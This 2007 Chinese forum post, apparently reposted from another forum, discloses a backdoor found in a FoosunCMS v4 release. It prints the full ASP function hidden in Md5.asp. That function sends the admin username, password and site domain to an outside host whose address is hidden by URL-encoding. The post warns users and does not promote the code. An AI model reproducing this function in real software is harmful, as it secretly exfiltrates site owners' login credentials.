账号通
    

账号  

密码  

2837

查看

9

回复
主题:[建议]希望科讯不要做跟风讯相同的事情 [收藏主题] 转到:  
newsfcn 当前离线

177

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:1996 分
登录次数:127 次
注册时间:2007/4/14
最后登录:2023/11/27
newsfcn 发表于:2007/8/26 17:12:00   | 显示全部帖子 查看该作者主题 楼主 
科汛在线商城系统(NET)

风讯被人发现了哦

一些内容是在落伍论坛看到的,已经被确认了。原帖子地址http://www.im286.com/viewthread.php?tid=2125610&highlight=%BF%D6%B2%C0

无意间发现foosun恐怖的代码

今日在做淘特CMS一键导入其它CMS数据时,轮到下载风讯最新的CMS代码,下载后的文件名为:FoosunCMS免费版v4_Sp5_完整版含模板.rar
解压后登录后台,结果却出现以下提示:下面是源文件
<script language='javascript'>alert('登陆过期,请重新登陆');window.top.location='http://192.168.1.114/Admin/login.asp?URLs=http://localhost/admin/index.asp?';</script>
有点纳闷!!怎么会自动出现个192.168.1.114IP呢,估计是程序测试时加入的吧,也许是个BUG。

于是直接输入登录地址:http://localhost/admin/login.asp
输入用户名和密码,提交登录。此次是OK了。
不过我的环境却检测到有数据包发送到:http://www.www512.cn/js/wz.asp这个地址。
到网上找到http://www.www512.cn,发现这只是个论坛,并不是风讯的网。奇怪!!
于是搜索包括www.www512.cn的代码,结果没有找到,终于在FS_Inc文件夹下找到Md5.asp文件,发现以下代码:
Public Function GETtoPostern(user,pass)
  dim sql
  dim http
  dim domain
  domain=Request.ServerVariables("SERVER_NAME"&Request.ServerVariables("HTTP_url"
  sql="name="&user&"&pass="&pass&"&domain="&domain
  set Http=server.createobject("MSXML2.XMLHTTP"
  Http.open "Post","http://www.www%35%31%32.cn/js/%77%7A%2Easp",false
  Http.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
  Http.send sql
  set http=nothing
  GETtoPostern=sql   
End Function
呵呵,一目了然了。
这段程序居然将你的用户名密码和网站地址(见:sql="name="&user&"&pass="&pass&"&domain="&domain)打包数据发送到http://www.www%35%31%32.cn/js/%77%7A%2Easp(用了urlencode,转过来就是http://www.www512.cn/js/wz.asp,怪不得搜索不到!!)
恐怖吧,你的网站一旦上线,用户名和密码就被发给别人了。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.06641秒 powered by KesionCMS 9.0